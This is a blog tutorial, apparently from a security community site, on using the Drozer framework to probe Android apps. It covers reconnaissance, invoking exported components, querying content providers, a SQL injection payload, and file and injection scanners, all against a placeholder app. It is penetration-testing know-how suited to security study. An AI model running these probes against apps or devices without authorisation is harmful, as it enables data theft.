UNDERCODE COMMUNITY

🦑 Drozer is a security assessment framework for Android apps, developed by MWR InfoSecurity (now part of F-Secure). It's used by penetration testers to assess Android applications for vulnerabilities. Here's a hacking tutorial for using Drozer to identify vulnerabilities in Android apps.

---

## Prerequisites
1. Install Drozer:
Drozer consists of two components:
- Agent (installed on the Android device)
- Console (run on your host machine)

Download the Drozer agent APK from [official GitHub](https://github.com/FSecureLABS/drozer) and install it on your Android device. Install the Drozer console using:

   sudo apt install python3-pip
   pip3 install drozer

2. Setup ADB:
Install Android Debug Bridge (ADB) to connect your Android device to your computer.

   sudo apt install adb

3. Rooted Device (Optional but Recommended):
Drozer can operate on non-rooted devices but works best with root privileges.

4. Enable USB Debugging:
Go to Settings > Developer Options > USB Debugging on your Android device.

---

## Step 1: Setting Up the Environment
1. Connect the Android Device:
Use ADB to ensure your device is detected:

   adb devices

2. Forward the Drozer Port:
Drozer communicates with the agent over port 31415. Forward this port using ADB:

   adb forward tcp:31415 tcp:31415

3. Start the Drozer Agent:
Launch the Drozer agent app on your Android device and click "Start Server".

4. Launch Drozer Console:
On your host machine, open the Drozer console:

   drozer console connect

---

## Step 2: Reconnaissance
Drozer has a modular design, with commands categorized into packages. Start by gathering basic information.

1. List Installed Packages:

   run app.package.list

2. Find Specific Apps:
Search for apps by keyword, e.g., for "vulnerable":

   run app.package.list -f vulnerable

3. Get Detailed App Information:
Get information about an app, such as permissions and activities:

   run app.package.info -a com.example.vulnerableapp

---

## Step 3: Exploit Common Vulnerabilities
Drozer can be used to test various vulnerabilities, including exported activities, insecure file storage, and SQL injection.

### 1. Test Exported Components
Exported components can be accessed by any app on the device. Drozer identifies and interacts with these components.

#### Activities:
List exported activities:

run app.activity.info -a com.example.vulnerableapp

Launch an exported activity:

run app.activity.start --component com.example.vulnerableapp com.example.vulnerableapp.MainActivity

#### Services:
List exported services:

run app.service.info -a com.example.vulnerableapp

Interact with a service:

run app.service.send --component com.example.vulnerableapp com.example.vulnerableapp.MyService

#### Content Providers:
Identify content providers and their permissions:

run app.provider.info -a com.example.vulnerableapp

Query content providers for data:

run app.provider.query content://com.example.vulnerableapp.provider/data

### 2. SQL Injection
Test content providers for SQL injection by manipulating query inputs:

run app.provider.query content://com.example.vulnerableapp.provider/data --projection "' OR '1'='1"

### 3. Insecure Data Storage
Check for sensitive data in app directories:

run scanner.misc.filebrowser -a com.example.vulnerableapp

### 4. Check for Debuggable Apps
Some apps are left in debuggable mode, exposing them to reverse engineering:

run app.package.debuggable

---

## Step 4: Automation and Exploit Modules
### Use Drozer's built-in exploit modules:
1. Scan for Known Vulnerabilities:

   run scanner.provider.injection -a com.example.vulnerableapp

2. Check for World-Readable Files:

   run scanner.misc.world_readable_files

---

## Step 5: Generate Reports
Keep logs of your findings for documentation:

drozer console connect > output.log

---

18 viewsUNDERCODER, 13:20

About

Blog

Apps

Platform